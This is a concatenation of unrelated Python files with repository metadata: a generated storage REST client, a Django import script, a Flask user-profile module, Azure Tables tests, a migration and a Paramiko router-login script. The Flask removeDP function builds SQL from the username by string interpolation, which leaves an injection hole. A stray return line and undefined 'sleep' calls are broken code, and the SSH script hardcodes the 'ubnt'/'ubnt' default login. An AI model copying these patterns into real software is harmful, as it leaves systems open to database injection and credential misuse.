        query_params.append(('resolution', params['resolution']))

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays/s3-specific-performance', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ArrayS3PerformanceResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def list_arrays_space(self, **kwargs):
    """List instant or historical array space.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param int start_time: time to start sample, milliseconds since epoch
    :param int end_time: time to end sample, milliseconds since epoch
    :param int resolution: sample frequency in milliseconds
    :param str type: sample file systems, object store, or all
    :return: ArraySpaceResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.list_arrays_space_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(**kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(**kwargs)
def list_arrays_space_with_http_info(self, **kwargs):
    """
    List instant or historical array space.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_arrays_space_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int start_time: Time to start sample in milliseconds since epoch.
    :param int end_time: Time to end sample in milliseconds since epoch.
    :param int resolution: sample frequency in milliseconds
    :param str type: to sample space of either file systems, object store, or all
    :return: ArraySpaceResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['start_time', 'end_time', 'resolution', 'type']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_arrays_space" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only forward query parameters the caller explicitly supplied.
    query_params = []
    if 'start_time' in params:
        query_params.append(('start_time', params['start_time']))
    if 'end_time' in params:
        query_params.append(('end_time', params['end_time']))
    if 'resolution' in params:
        query_params.append(('resolution', params['resolution']))
    if 'type' in params:
        query_params.append(('type', params['type']))

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays/space', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ArraySpaceResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def list_clients_performance(self, **kwargs):
    """List client performance.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param list[str] names: comma-separated resource names; mutually
        exclusive with the ids query parameters
    :param str filter: filter to be used for the query
    :param str sort: ordering of the results
    :param int limit: limit, should be >= 0
    :return: ClientPerformanceResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.list_clients_performance_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(**kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(**kwargs)
def list_clients_performance_with_http_info(self, **kwargs):
    """
    List client performance.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_clients_performance_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
    :param str filter: The filter to be used for query.
    :param str sort: The way to order the results.
    :param int limit: limit, should be >= 0
    :return: ClientPerformanceResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['names', 'filter', 'sort', 'limit']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_clients_performance" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only forward query parameters the caller explicitly supplied.
    query_params = []
    if 'names' in params:
        query_params.append(('names', params['names']))
        # The list of names is serialized as comma-separated values.
        collection_formats['names'] = 'csv'
    if 'filter' in params:
        query_params.append(('filter', params['filter']))
    if 'sort' in params:
        query_params.append(('sort', params['sort']))
    if 'limit' in params:
        query_params.append(('limit', params['limit']))

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays/clients/performance', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ClientPerformanceResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def update_arrays(self, array_settings, **kwargs):
    """Update arrays.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param PureArray array_settings: (required)
    :return: ArrayResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.update_arrays_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(array_settings, **kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(array_settings, **kwargs)
def update_arrays_with_http_info(self, array_settings, **kwargs):
    """
    Update arrays.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.update_arrays_with_http_info(array_settings, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param PureArray array_settings: (required)
    :return: ArrayResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['array_settings']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_arrays" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'array_settings' is set
    if ('array_settings' not in params) or (params['array_settings'] is None):
        raise ValueError("Missing the required parameter `array_settings` when calling `update_arrays`")

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The settings object is serialized as the PATCH request body.
    body_params = None
    if 'array_settings' in params:
        body_params = params['array_settings']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays', 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ArrayResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
| [
"[email protected]"
]
| |
f373e27e3ba576b9f7a22bbc7276a5e8c633bcb2 | e65ac1ea21eee50e7b5b5d5f8e0d8ceea2cb1c9a | /import/its-behind-you/import.py | 559133b57b5a5d8d7ca57d4823458c831c88daf3 | []
| no_license | dracos/Theatricalia | 539b42746dea86c0377db2593ba651e3563c1579 | 8cb417f5048a261329bc853bfcc6ba64c76daec8 | refs/heads/master | 2023-02-19T18:56:56.751263 | 2023-02-15T21:39:40 | 2023-02-15T22:13:42 | 1,178,517 | 5 | 2 | null | 2021-01-06T14:38:26 | 2010-12-17T23:02:50 | Python | UTF-8 | Python | false | false | 2,718 | py | #!/usr/bin/python
import os, sys, re, time
for i in range(3, 0, -1):
sys.path.append('../' * i)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.files.base import ContentFile
from plays.models import Play
from productions.models import Production, Part, ProductionCompany
from productions.models import Place as ProductionPlace
from people.models import Person
from photos.models import Photo
from functions import *
from plays2009 import *
# NOTE(review): indentation below was reconstructed from a flattened dump;
# the nesting of the trailing Part/castLinks statements inside the
# `if not dry_run():` branch should be confirmed against the original file.
real_run()

# Resolve every venue string to a theatre record, caching the result back
# into the `theatres` mapping so productions can look venues up by name.
for venue in theatres:
    if "," in venue:
        # "Name, Town" entries carry the town after the last comma.
        name, town = venue.rsplit(',', 1)
        location = add_theatre(name, town)
    else:
        location = add_theatre(venue)
    theatres[venue] = location

# Import each production: play, producing company, photos, venue dates
# and cast, honouring dry_run() so nothing is written during a trial pass.
for production in plays:
    title = production['title']
    log("Production of %s" % title)
    play = add_play(title, force_insert=True)
    company = None
    producer = production['producer']
    if producer:
        if dry_run():
            # Dry run: build an unsaved in-memory company only.
            company = ProductionCompany(name=producer)
        else:
            company, created = ProductionCompany.objects.get_or_create(name=producer)
    description = production['description']
    source = '<a href="%s">its-behind-you.com</a>' % production['source']
    production_obj = Production(
        play = play,
        company = company,
        description = description,
        source = source,
    )
    if not dry_run():
        production_obj.save()
    if production['titleImg']:
        add_photo(production['titleImg'], production_obj, 'Title')
    for p in production['pictures']:
        add_photo(p, production_obj, 'Handbill')
    dates = production['dates']
    for d in dates:
        # Each date entry is ((start_date, end_date), venue_name).
        start_date, end_date = d[0]
        place = d[1]
        location = theatres[place]
        log(' %s %s %s' % (start_date, end_date, location))
        if not dry_run():
            ProductionPlace.objects.get_or_create(production=production_obj, place=location, start_date=start_date, end_date=end_date)
    cast = production['cast']
    for name in cast:
        # Split "First[ Middle] Last" on the final space; single-word
        # names become last-name-only records.
        m = re.match('(.*) (.*?)$', name)
        if m:
            first_name, last_name = m.group(1), m.group(2)
        else:
            first_name, last_name = u'', name
        log(' Actor: ' + first_name + ' ' + last_name)
        if not dry_run():
            try:
                person, created = Person.objects.get_or_create(first_name=first_name, last_name=last_name)
            # Bare except (pre-existing): falls back to creating a fresh
            # Person record when the lookup fails for any reason.
            except:
                person = Person(first_name=first_name, last_name=last_name)
                person.save()
            Part.objects.get_or_create(production=production_obj, person=person, cast=True)
            if name in castLinks:
                # Attach the actor's website when the scrape captured one.
                person.web = castLinks[name]
                person.save()
| [
"[email protected]"
]
| |
7eaa3fc42b530ce553df3f478e57dfcb78907226 | 335efc133db52ce3dcbb114f6be1e2e5c308ab35 | /backend/myprofile.py | 677b25332bc919433660284ec8608f4900feeaf6 | []
| no_license | mrclauderandall/CS-Capstone-Project | 12c9987713bf398fee838b6a1025fafbf3a8885d | cc599ac7d836360bfb78c80e4bbfb893bca39c2f | refs/heads/master | 2023-06-29T13:16:56.207602 | 2021-08-09T02:51:34 | 2021-08-09T02:51:34 | 394,126,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | import psycopg2
from flask import jsonify
#
# Should we migrate these functions to user.py?
#
def myprofile(username, conn):
    """Return all user rows whose email matches *username*, as JSON.

    :param username: email address identifying the user (untrusted input)
    :param conn: open psycopg2 connection; closed before returning
    :return: Flask JSON response containing the matching rows
    """
    cur = conn.cursor()
    # SECURITY FIX: use a parameterized query instead of f-string
    # interpolation, which allowed SQL injection via `username`.
    cur.execute(
        "SELECT * FROM public.users WHERE email = %s", (username,)
    )
    result = cur.fetchall()
    conn.close()
    return jsonify(result)
def editprofile(email, first_name, last_name, password, username, conn):
    """Update the profile of the user currently identified by *username*.

    :param email: new email address to store
    :param first_name: new first name
    :param last_name: new last name
    :param password: new password value (stored as given — hashing, if any,
        is presumably done by the caller; TODO confirm)
    :param username: current email used to locate the row (untrusted input)
    :param conn: open psycopg2 connection; committed and closed here
    :return: Flask JSON response containing 200
    """
    cur = conn.cursor()
    # SECURITY FIX: parameterized UPDATE replaces f-string interpolation,
    # which allowed SQL injection via any of the user-supplied fields.
    cur.execute(
        "UPDATE public.users SET first_name = %s, last_name = %s, "
        "password = %s, email = %s WHERE email = %s",
        (first_name, last_name, password, email, username),
    )
    conn.commit()
    conn.close()
    return jsonify(200)
def setDP(image_url, username, conn):
    """Set the profile picture URL for the user identified by *username*.

    :param image_url: URL of the uploaded image (untrusted input)
    :param username: email locating the user row (untrusted input)
    :param conn: open psycopg2 connection; committed and closed here
    :return: Flask JSON response containing 200
    """
    cur = conn.cursor()
    # SECURITY FIX: parameterized UPDATE replaces f-string interpolation,
    # which allowed SQL injection via `image_url` or `username`.
    cur.execute(
        "UPDATE public.users SET profile_pic = %s WHERE email = %s",
        (image_url, username),
    )
    conn.commit()
    conn.close()
    return jsonify(200)
def getDP(username, conn):
    """Fetch the profile picture URL for the user identified by *username*.

    :param conn: open psycopg2 connection; committed and closed here
    :return: Flask JSON response with the URL, or null when no row matches
    """
    cur = conn.cursor()
    # SECURITY FIX: parameterized SELECT replaces f-string interpolation,
    # which allowed SQL injection via `username`.
    cur.execute(
        "SELECT profile_pic FROM public.users WHERE email = %s", (username,)
    )
    result = cur.fetchone()
    conn.commit()
    conn.close()
    # ROBUSTNESS FIX: the original crashed with TypeError on `result[0]`
    # when no user matched; return JSON null in that case instead.
    if result is None:
        return jsonify(None)
    return jsonify(result[0])
return (jsonify(result[0]))
def removeDP(username, conn):
cur = conn.cursor()
cur.execute(
f"UPDATE public.users SET profile_pic = NULL WHERE email = '{username}'"
)
conn.commit()
conn.close()
return(jsonify(200)) | [
"[email protected]"
]
| |
bb7d789c7df59f3ef3d4b7d31cc5b89a64bbb3c6 | 51cbd904e17e45f6adb5303c3532a6ff0519ab42 | /sdk/tables/azure-data-tables/tests/test_table_service_properties_cosmos.py | 139f3c1973a4a4d8f57e5f7f63813ae8c7bfbeef | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
]
| permissive | heaths/azure-sdk-for-python | 203e9a6052d7dff5b5f2346bced86b9406be3419 | 77feaf14471eba6642f5c7ae2f3f06981ff361d7 | refs/heads/master | 2022-07-26T06:46:57.067502 | 2021-04-15T21:35:26 | 2021-04-15T21:35:26 | 239,629,447 | 0 | 0 | MIT | 2020-02-10T22:46:20 | 2020-02-10T22:46:19 | null | UTF-8 | Python | false | false | 9,896 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import time
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import HttpResponseError
from azure.data.tables import (
TableServiceClient,
TableAnalyticsLogging,
Metrics,
RetentionPolicy,
CorsRule
)
from _shared.testcase import TableTestCase
from preparers import CosmosPreparer
# ------------------------------------------------------------------------------
class TableServicePropertiesTest(AzureTestCase, TableTestCase):
# --Helpers-----------------------------------------------------------------
def _assert_properties_default(self, prop):
    """Assert *prop* carries the service's default (all-disabled) settings:
    default logging, default hour/minute metrics and an empty CORS list."""
    assert prop is not None
    self._assert_logging_equal(prop['analytics_logging'], TableAnalyticsLogging())
    self._assert_metrics_equal(prop['hour_metrics'], Metrics())
    self._assert_metrics_equal(prop['minute_metrics'], Metrics())
    self._assert_cors_equal(prop['cors'], list())
def _assert_logging_equal(self, log1, log2):
    """Assert two analytics-logging settings are equivalent.

    Two ``None`` values compare equal; otherwise every scalar field and
    the nested retention policy must match.
    """
    if log1 is None or log2 is None:
        # Only equal when both sides are None.
        assert log1 == log2
        return
    for field in ('version', 'read', 'write', 'delete'):
        assert getattr(log1, field) == getattr(log2, field)
    self._assert_retention_equal(log1.retention_policy, log2.retention_policy)
def _assert_delete_retention_policy_equal(self, policy1, policy2):
    """Assert two delete-retention policies match (both may be None)."""
    if policy1 is None or policy2 is None:
        # Only equal when both sides are None.
        assert policy1 == policy2
        return
    for field in ('enabled', 'days'):
        assert getattr(policy1, field) == getattr(policy2, field)
def _assert_static_website_equal(self, prop1, prop2):
    """Assert two static-website property objects are equivalent."""
    if prop1 is None or prop2 is None:
        # Only equal when both sides are None.
        assert prop1 == prop2
        return
    for field in ('enabled', 'index_document', 'error_document404_path'):
        assert getattr(prop1, field) == getattr(prop2, field)
def _assert_delete_retention_policy_not_equal(self, policy1, policy2):
    """Assert two delete-retention policies differ in at least one field."""
    if policy1 is None or policy2 is None:
        assert policy1 != policy2
        return
    # De Morgan of the original `not (enabled equal and days equal)`.
    assert policy1.enabled != policy2.enabled or policy1.days != policy2.days
def _assert_metrics_equal(self, metrics1, metrics2):
    """Assert two metrics settings objects are equivalent.

    Two ``None`` values compare equal; otherwise every scalar field and
    the nested retention policy must match.
    """
    if metrics1 is None or metrics2 is None:
        # Only equal when both sides are None.
        assert metrics1 == metrics2
        return
    for field in ('version', 'enabled', 'include_apis'):
        assert getattr(metrics1, field) == getattr(metrics2, field)
    self._assert_retention_equal(metrics1.retention_policy, metrics2.retention_policy)
def _assert_cors_equal(self, cors1, cors2):
    """Assert two CORS rule lists are pairwise equivalent.

    Rules are compared positionally; list-valued fields are compared by
    length only (matching the original helper's behavior).
    """
    if cors1 is None or cors2 is None:
        # Only equal when both sides are None.
        assert cors1 == cors2
        return
    assert len(cors1) == len(cors2)
    for rule1, rule2 in zip(cors1, cors2):
        assert len(rule1.allowed_origins) == len(rule2.allowed_origins)
        assert len(rule1.allowed_methods) == len(rule2.allowed_methods)
        assert rule1.max_age_in_seconds == rule2.max_age_in_seconds
        assert len(rule1.exposed_headers) == len(rule2.exposed_headers)
        assert len(rule1.allowed_headers) == len(rule2.allowed_headers)
def _assert_retention_equal(self, ret1, ret2):
    """Assert two retention policies agree on the enabled flag and days."""
    for field in ('enabled', 'days'):
        assert getattr(ret1, field) == getattr(ret2, field)
# --Test cases per service ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_table_service_properties(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
    """Setting all-default service properties succeeds and round-trips."""
    # Arrange
    url = self.account_url(tables_cosmos_account_name, "cosmos")
    tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
    # Act
    resp = tsc.set_service_properties(
        analytics_logging=TableAnalyticsLogging(),
        hour_metrics=Metrics(),
        minute_metrics=Metrics(),
        cors=list())
    # Assert
    assert resp is None
    self._assert_properties_default(tsc.get_service_properties())

    if self.is_live:
        # BUGFIX: the original called `sleep(SLEEP_DELAY)`, but only the
        # `time` module is imported and SLEEP_DELAY is never defined, so
        # live runs would raise NameError. Use the same 30-second delay
        # as test_set_logging.
        time.sleep(30)
# --Test cases per feature ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_logging(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
    """Analytics logging settings should round-trip through the service."""
    # Arrange
    url = self.account_url(tables_cosmos_account_name, "cosmos")
    tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
    logging = TableAnalyticsLogging(read=True, write=True, delete=True, retention_policy=RetentionPolicy(enabled=True, days=5))

    # Act
    tsc.set_service_properties(analytics_logging=logging)

    # Assert
    received_props = tsc.get_service_properties()
    self._assert_logging_equal(received_props['analytics_logging'], logging)

    if self.is_live:
        # Give the live service time to propagate the new settings before
        # the next recorded test runs.
        time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_hour_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
    """Hour-metrics settings should round-trip through the service."""
    # Arrange
    url = self.account_url(tables_cosmos_account_name, "cosmos")
    tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
    hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=RetentionPolicy(enabled=True, days=5))

    # Act
    tsc.set_service_properties(hour_metrics=hour_metrics)

    # Assert
    received_props = tsc.get_service_properties()
    self._assert_metrics_equal(received_props['hour_metrics'], hour_metrics)

    if self.is_live:
        # BUGFIX: the original called the undefined names `sleep`/`SLEEP_DELAY`
        # (NameError in live runs); use the same delay as test_set_logging.
        time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_minute_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
    """Minute-metrics settings should round-trip through the service."""
    # Arrange
    url = self.account_url(tables_cosmos_account_name, "cosmos")
    tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
    minute_metrics = Metrics(enabled=True, include_apis=True,
                             retention_policy=RetentionPolicy(enabled=True, days=5))

    # Act
    tsc.set_service_properties(minute_metrics=minute_metrics)

    # Assert
    received_props = tsc.get_service_properties()
    self._assert_metrics_equal(received_props['minute_metrics'], minute_metrics)

    if self.is_live:
        # BUGFIX: the original called the undefined names `sleep`/`SLEEP_DELAY`
        # (NameError in live runs); use the same delay as test_set_logging.
        time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_cors(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
cors_rule1 = CorsRule(['www.xyz.com'], ['GET'])
allowed_origins = ['www.xyz.com', "www.ab.com", "www.bc.com"]
allowed_methods = ['GET', 'PUT']
max_age_in_seconds = 500
exposed_headers = ["x-ms-meta-data*", "x-ms-meta-source*", "x-ms-meta-abc", "x-ms-meta-bcd"]
allowed_headers = ["x-ms-meta-data*", "x-ms-meta-target*", "x-ms-meta-xyz", "x-ms-meta-foo"]
cors_rule2 = CorsRule(
allowed_origins,
allowed_methods,
max_age_in_seconds=max_age_in_seconds,
exposed_headers=exposed_headers,
allowed_headers=allowed_headers)
cors = [cors_rule1, cors_rule2]
# Act
tsc.set_service_properties(cors=cors)
# Assert
received_props = tsc.get_service_properties()
self._assert_cors_equal(received_props['cors'], cors)
if self.is_live:
sleep(SLEEP_DELAY)
# --Test cases for errors ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_too_many_cors_rules(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
cors = []
for i in range(0, 6):
cors.append(CorsRule(['www.xyz.com'], ['GET']))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties, None, None, None, cors)
if self.is_live:
sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_retention_too_long(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=366))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties,
None, None, minute_metrics)
if self.is_live:
sleep(SLEEP_DELAY)
class TestTableUnitTest(TableTestCase):
def test_retention_no_days(self):
# Assert
pytest.raises(ValueError, RetentionPolicy, True, None)
| [
"[email protected]"
]
| |
61327de1c6f0afb604104a7376dc24faaed7a103 | 42c6e00741a37d02880f14d49fa6f7d2f484cd22 | /market_place/article/migrations/0001_initial.py | 198b81c5bc9d5b6665d8db75449a4c76974684d4 | [
"MIT"
]
| permissive | otherland8/market-place | 023d34f92809ff61a3ee3e60007c27597b10047f | ebf21a77cf9b3998e270ebd2d4422d7ce997e472 | refs/heads/master | 2021-01-17T12:47:51.847532 | 2016-07-08T20:20:31 | 2016-07-08T20:20:31 | 59,594,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-08 16:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('public', '0005_auto_20160708_1736'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserBid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9)),
('maximum_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9, null=True)),
('created_date', models.DateTimeField(auto_now=True)),
('last_bid_date', models.DateTimeField()),
('is_smart_bid', models.BooleanField(default=True)),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='public.Article')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
]
| |
15660f72a517e3b32ec05f1edde94a333241df3b | 1a41addd7ca9486b5392158984f0e5c14d92edff | /tests.py | 331c9c2324a88becd6a3d030e51f2608966da740 | [
"MIT"
]
| permissive | humin11/sixquant | 32e94c2d1035c87a5cad816dd1286613c54174cd | bf3614c34cdbd4373dcbfc0cb24f58a1d7957d47 | refs/heads/master | 2021-08-26T08:37:33.808255 | 2017-11-22T16:10:36 | 2017-11-22T16:10:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # coding=utf-8
import os
import sys
import unittest
root = os.path.abspath(os.path.expanduser(__file__ + '/../tests'))
sys.path.append(root)
if __name__ == '__main__':
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.discover('tests'))
unittest.TextTestRunner().run(suite)
| [
"[email protected]"
]
| |
bc54e1b48cf35f7afe4085bcfc57748031ff30b5 | 8ac0beeda7da3f6059f47dbd71f90a375589b8eb | /Ubiquiti/EdgeRouter-Lite.py | 5c1e1a6a434fbfc723d8a192f78062264691d878 | []
| no_license | evgenyzorin/Paramiko | f98dbabdb0954c4e55ecd88604de6ba81d421e6c | 9deb3d6d0491717524117dfd2c1a9cb4c968d016 | refs/heads/main | 2023-09-02T16:43:13.279258 | 2021-11-11T08:34:49 | 2021-11-11T08:34:49 | 390,994,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | from paramiko import SSHClient, AutoAddPolicy
from datetime import datetime
import re
start_time = datetime.now()
def send_show_command(
devices,
username,
password,
command,
max_bytes=60000,
delay=1,
):
client = SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(AutoAddPolicy())
info = {}
for device in devices:
print(f'\n---------- Connecting device {device} ----------\n')
client.connect(
hostname=device,
username=username,
password=password,
look_for_keys=False,
allow_agent=False,
)
stdin, stdout, sterr = client.exec_command(command)
output = stdout.readlines()
for line in output[3:]:
data = [i.strip() for i in line.split(' ') if i]
if re.search('[a-zA-Z]', data[0]):
interface = data[0]
info[interface] = {
'ip': [data[1]],
'state': data[2].split('/')[0],
'link': data[2].split('/')[1],
'description': data[3],
}
else:
info[interface]['ip'].append(data[0])
print(info)
if __name__ == '__main__':
devices = ['192.168.1.1', '192.168.1.2']
command = '/opt/vyatta/bin/vyatta-op-cmd-wrapper show interfaces'
send_show_command(devices, 'ubnt', 'ubnt', command)
run_time = datetime.now() - start_time
print(f'\n---------- Elapsed time: {run_time} ----------\n')
| [
"[email protected]"
]
| |
266486163cb2f2c144efffc3cfa02050697431de | d7de23e521d73096f173318423cf6b0e5d06c97f | /CMGTools/LEP3/python/kinfitters.py | 2721d051ec15e98ffabeebf5f9689b3c2383578a | []
